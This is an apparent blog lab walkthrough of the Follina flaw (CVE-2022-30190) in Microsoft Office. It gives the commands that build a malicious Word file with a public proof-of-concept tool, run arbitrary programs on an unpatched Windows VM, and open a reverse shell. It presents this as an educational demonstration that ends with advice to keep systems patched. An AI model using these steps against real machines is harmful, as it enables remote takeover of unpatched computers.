CVE stands for Common Vulnerabilities and Exposures. In simple terms, it means the assigning of numbers to vulnerabilities or security issues that are found within a computer system or software. The main purpose of CVE is to provide a consistent reference for organizations and users to effectively track and manage their vulnerabilities.
The security vulnerability named CVE-2022-30190, otherwise known as "Follina" shocked the cybersecurity community in 2022 because of its potential to spread. This is a vulnerability in Microsoft Office products, particularly in Word, that enables attackers to remotely execute code by just tricking users into opening a specially crafted document. It is, however, very dangerous since it does not depend on the enablement of macros, and that makes blocking of such an attack harder with traditional security measures.
Some sources about the discovery of CVE-2022-30190 :
Just do a system update by turning on the system update periodically on your Microsoft Windows operating system.
Some resources on how to mitigate CVE-2022-30190 :
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running on vm) as the victim
- Virtual Box
- The attacks in this experiment were only performed on the same local network
- The attack can be carried out through the outside network, but requires some tinkering
- The attack in this test was carried out with the antivirus disabled on the victim's computer
- The attack can only be carried out on Microsoft Windows operating systems that are old builds or that have not received new security patches since May 30, 2022 including Windows 10 and 11
Do an update on the attacker's computer (host) which here uses the Debian 12 operating system by using this command
$ sudo apt update && sudo apt upgrade -y
Install GIT if not already
$ sudo apt install git
Install Python if not already
$ sudo apt install python3
Install "netifaces" module for Python3
$ sudo apt install python3-netifaces
Clone the payload repository created by John Hammond and move to its directory
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
Run the payload and move the follina.doc file located in the msdt-follina directory to the victim's computer
$ python3 follina.py
Open the follina.doc file on the victim's computer If the payload is successful, the calculator application will open
To execute other programs you can use the command (here I'm using an example to open the notepad application)
$ python3 follina.py -c "notepad.exe"
To do a reverse shell payload you can simply using this following command
$ python3 follina.py -r 9999
If the reverse shell payload is successful, you will directly enter the victim's computer directory and you can do whatever you want on the victim's computer
As of July 22, 2022, this vulnerability has been patched by Microsoft, but it does not rule out the possibility that this vulnerability can still have an impact on those who do not regularly update their Windows operating system. Therefore do not forget to always update your operating system to keep cybercriminals from doing their actions, Cheers!